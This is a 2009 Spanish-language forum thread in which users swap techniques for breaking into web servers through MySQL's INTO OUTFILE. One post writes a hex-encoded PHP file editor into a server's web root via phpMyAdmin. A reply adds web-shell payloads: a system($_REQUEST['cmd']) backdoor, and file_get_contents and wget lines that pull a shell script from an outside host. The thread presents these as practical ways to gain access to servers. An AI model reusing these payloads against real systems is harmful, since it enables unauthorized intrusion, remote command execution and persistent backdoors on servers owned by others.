Un buen uso de INTO OUTFILE

Iniciado por HardieVon, 6 Marzo 2009, 02:17 AM

0 Miembros y 1 Visitante están viendo este tema.

HardieVon

Hola que tal encontre un servidor con phpmyadmin y entre tantas pruebas de codigo como.
<? system(...
<? eval(....
me decidi en fabricar una  pequeña herramientilla.

utilizando la instruccion OUTFILE...
Código (sql) [Seleccionar]

SELECT 0x64 /* Hexadecimal */ INTO OUTFILE "C:/servidor/editor.php"; /* Path del servidor */

y con el codigo php.
Código (php) [Seleccionar]

<?php $f=$_GET['f'];$s=$_POST['s'];if($s!=''){if($r=fopen($f,'w+')){fwrite($r,stripslashes($s));echo 'OK<br>';}fclose($r);}$r=fopen($f,'r');$c=fread($r,filesize($f));fclose($r);echo "<form method=POST ><textarea name=s >$c</textarea><br><input type=submit value=guardar ></form>";?>


ahora concluimos con este codigo y podremos editar archivos en el servidor...

Código (sql) [Seleccionar]

SELECT
0x3C3F7068702024663D245F4745545B2766275D3B24733D245F504F53545B2773275D3B6966282473213D2727297B69662824723D666F70656E2824662C27772B2729297B6677726974652824722C7374726970736C617368657328247329293B6563686F20274F4B3C62723E273B7D66636C6F7365282472293B7D24723D666F70656E2824662C277227293B24633D66726561642824722C66696C6573697A6528246629293B66636C6F7365282472293B6563686F20223C666F726D206D6574686F643D504F5354203E3C7465787461726561206E616D653D73203E24633C2F74657874617265613E3C62723E3C696E70757420747970653D7375626D69742076616C75653D67756172646172203E3C2F666F726D3E223B3F3E
INTO OUTFILE "C:/servidor/editor.php";


el nombre del fichero se pasa por una variable GET llamada "f".
de la forma editor.php?f=index.php

Saludos de perro

OzX

hi brota¡
Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos.

Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor.

Y en este Post:
http://foro.undersecurity.net/read.php?15,772

E Posteado varias Formas de Obtener Privilegios  Mediante esta tecnica.

Por ej En el Source a Insertar. Ingresar.

<? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?>

Tambien Se Puede pasar  a Hexa SQL para no tener dramas con las " "

En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente


<? system($_REQUEST['cmd']); ?>


y Luego con Wget

wget -c --output-document=shell.php www.script.com/shell.txt


Asi Kedaria

http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt



Y Vuala ¡




Saludos¡

HardieVon

#2
Si lo que pasa es que con esa tecnica.. existen archivos que superan el tiempo de ejecucion... por que el file_get, supera en algunos casos...colosales tamaños como la c99 y tambien existen algunos server sin consola...



Saludos de perro

OzX

Citartambien existen algunos server sin consola
Como?

:huh: